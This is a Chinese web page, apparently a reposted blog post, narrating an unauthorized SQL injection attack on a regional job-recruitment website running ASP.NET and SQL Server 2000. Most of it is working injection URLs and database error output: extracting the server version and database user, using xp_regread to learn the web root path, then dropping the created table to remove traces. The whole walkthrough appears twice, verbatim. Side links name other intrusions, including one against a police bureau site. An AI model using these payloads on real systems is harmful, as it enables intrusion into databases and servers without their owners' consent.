安全检测ASP.net开发网站实例
网络安全 2021-07-03 09:40www.168986.cn网络安全知识
今天上了一个人才招聘网站,对他们的招聘系统我很感兴趣,aspx结尾的,看来是.的程序,这样的网站会不会有什么漏洞呢?顺便打开一条消息 http://.will./NewsShow.aspx?id=4847 ,然后加一个' 看看出现什么?我晕。。
Source: .Net SqlClient Data Provider
Description: 字符串 '' 之前有未闭合的引号。
TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)
似乎有可能,然后 1=1 正常 1=2出错。。这和asp的似乎没有区别阿。。于是把NBSI挂上了,竟然也可以猜出表名来,和ASP没区别。不过NBSI不认识这里的出错信息,只能按照没有提示的方式破。。先暂停一下NBSI,输入
http://.will./NewsShow.aspx?id=4844 and 0<;>(select @@version)--
提示
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
是个2000的Enterprise server而且SP4了。。然后
_name">http://.will./NewsShow.aspx?id=4844 and 0<;>user_name()
提示
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哦?用dbo的身份连接?应该有搞头。。
按照破解ASP网站的方法,要他的绝对路径用以下,第一步建立一个表
http://.will./NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
把web路径写进去
http://.will./NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
还是让他不匹配,显示错误
http://.will./NewsShow.aspx?id=4844 and 1=(select count() from cyfd where gyfd >1)
得到提示
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 'Y:\Web\烟台人才热线后台管理系统,,201 ' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哈哈哈。。路径暴露了。。
接下来删除痕迹
http://.will./NewsShow.aspx?id=4844;drop table cyfd;--
后边该怎么做就不多说了。。和安全检测ASP的网站一样。。
Source: .Net SqlClient Data Provider
Description: 字符串 '' 之前有未闭合的引号。
TargeSite: System.Data.SqlClient.SqlDataReader ExecuteReader(System.Data.CommandBehavior, System.Data.SqlClient.RunBehavior, Boolean)
似乎有可能,然后 1=1 正常 1=2出错。。这和asp的似乎没有区别阿。。于是把NBSI挂上了,竟然也可以猜出表名来,和ASP没区别。不过NBSI不认识这里的出错信息,只能按照没有提示的方式破。。先暂停一下NBSI,输入
http://.will./NewsShow.aspx?id=4844 and 0<;>(select @@version)--
提示
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
是个2000的Enterprise server而且SP4了。。然后
_name">http://.will./NewsShow.aspx?id=4844 and 0<;>user_name()
提示
Source: .Net SqlClient Data Provider
Description: 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哦?用dbo的身份连接?应该有搞头。。
按照破解ASP网站的方法,要他的绝对路径用以下,第一步建立一个表
http://.will./NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
把web路径写进去
http://.will./NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
还是让他不匹配,显示错误
http://.will./NewsShow.aspx?id=4844 and 1=(select count() from cyfd where gyfd >1)
得到提示
Source: .Net SqlClient Data Provider
Description: 将 varchar 值 'Y:\Web\烟台人才热线后台管理系统,,201 ' 转换为数据类型为 int 的列时发生语法错误。
TargeSite: Boolean Read()
哈哈哈。。路径暴露了。。
接下来删除痕迹
http://.will./NewsShow.aspx?id=4844;drop table cyfd;--
后边该怎么做就不多说了。。和安全检测ASP的网站一样。。
上一篇:入侵某一游戏交易网
下一篇:友情检测某市公安局网站
网络安全培训
- 网络安全常见漏洞类型 网络安全常见漏洞类型包
- 绿色上网顺口溜七言 绿色上网的宣传标语
- 网络安全等级保护测评 网络安全等级保护条例
- 如何加强网络安全 网络安全隐患有哪些
- 网络安全防护措施有哪些 网络安全等级保护等级
- 如何保障网络安全 如何做好网络安全保障工作
- 维护网络安全的措施有哪些 维护网络安全的主要
- 网络安全工程师好学吗 2024年网络安全工程师好学
- 网络安全注意事项简短 网络安全注意事项100字
- 网络安全面临的挑战 当前网络安全面临的新问题
- 网络安全培训哪个靠谱 网络安全培训找哪个
- 普及网络安全知识内容 普及网络安全教育
- 网络安全防范知识宣传内容 网络安全防范知识宣
- 如何做好网络安全工作 如何做好网络安全工作
- 网络安全常识的丰富内容 网络安全的相关知识
- 青少年网络安全教育片 青少年网络安全知识讲座